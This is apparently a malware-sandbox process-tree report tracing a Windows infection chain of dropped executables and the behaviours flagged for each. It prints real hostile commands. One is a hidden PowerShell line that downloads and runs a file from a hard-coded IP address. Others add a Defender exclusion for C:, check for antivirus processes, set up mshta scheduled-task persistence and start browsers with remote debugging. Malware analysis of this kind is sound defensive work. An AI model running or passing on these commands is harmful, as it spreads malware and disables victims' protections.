PID:4244 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3628
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4400
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\10369120101\c606d285b9.exe"C:\Users\Admin\AppData\Local\Temp\10369120101\c606d285b9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 4968⤵
- Program crash
PID:5704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5176
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3648 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5104 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff7a88dcf8,0x7fff7a88dd04,0x7fff7a88dd109⤵PID:3092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1972 /prefetch:29⤵PID:1900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2268 /prefetch:39⤵PID:3860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2556 /prefetch:89⤵PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3164 /prefetch:19⤵
- Uses browser remote debugging
PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3208 /prefetch:19⤵
- Uses browser remote debugging
PID:1760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4196,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4240 /prefetch:29⤵
- Uses browser remote debugging
PID:4024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4700 /prefetch:19⤵
- Uses browser remote debugging
PID:6132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4620,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4876 /prefetch:89⤵PID:1032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5504 /prefetch:89⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5608,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5192 /prefetch:89⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5712 /prefetch:89⤵PID:6084
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff7a0ef208,0x7fff7a0ef214,0x7fff7a0ef2209⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:29⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:39⤵PID:5784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2464,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:89⤵PID:2564
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:19⤵
- Uses browser remote debugging
PID:6104
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3560,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:19⤵
- Uses browser remote debugging
PID:440
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9r1ng" & exit8⤵
- System Location Discovery: System Language Discovery
PID:8844 -
C:\Windows\SysWOW64\timeout.exetimeout /t 119⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:8932
C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5900
C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6024 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4748
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:5268
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1708
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:3452
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:5024
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:5916
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:2988
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:3172
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:3316
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4856
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:5284
C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:5008 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:2216
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4904 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5312
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:3632 -
C:\Users\Admin\AppData\Local\Temp\{e17b978d-28ea-44b3-bdc7-a6c6c6c0e114}\b2e2ac1.exe"C:\Users\Admin\AppData\Local\Temp\{e17b978d-28ea-44b3-bdc7-a6c6c6c0e114}\b2e2ac1.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:10984 -
C:\Users\Admin\AppData\Local\Temp\{dbcc2bd4-9819-4356-96dd-348868c0c2ff}\46e716e8.exeC:/Users/Admin/AppData/Local/Temp/{dbcc2bd4-9819-4356-96dd-348868c0c2ff}/\46e716e8.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:11784
C:\Users\Admin\AppData\Local\Temp\10369180101\62b36023a0.exe"C:\Users\Admin\AppData\Local\Temp\10369180101\62b36023a0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn loCMOmaONKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn loCMOmaONKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:12788
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5824 -
C:\Users\Admin\AppData\Local\TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE"C:\Users\Admin\AppData\Local\TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7420
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:13104 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:13148
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:13252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:13268
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:7012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7056
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mFRT3maNjF7" /tr "mshta \"C:\Temp\jGzWfJYVb.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4764
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\jGzWfJYVb.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7476
C:\Users\Admin\AppData\Local\Temp\10369200101\627d431241.exe"C:\Users\Admin\AppData\Local\Temp\10369200101\627d431241.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6168 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5204
C:\Users\Admin\AppData\Local\Temp\10369210101\02a203a317.exe"C:\Users\Admin\AppData\Local\Temp\10369210101\02a203a317.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9172
C:\Users\Admin\AppData\Local\Temp\10369220101\cdf48d376b.exe"C:\Users\Admin\AppData\Local\Temp\10369220101\cdf48d376b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10056
C:\Users\Admin\AppData\Local\Temp\10369230101\e6e32e2403.exe"C:\Users\Admin\AppData\Local\Temp\10369230101\e6e32e2403.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:10612 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:12256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff7be8dcf8,0x7fff7be8dd04,0x7fff7be8dd108⤵PID:6740
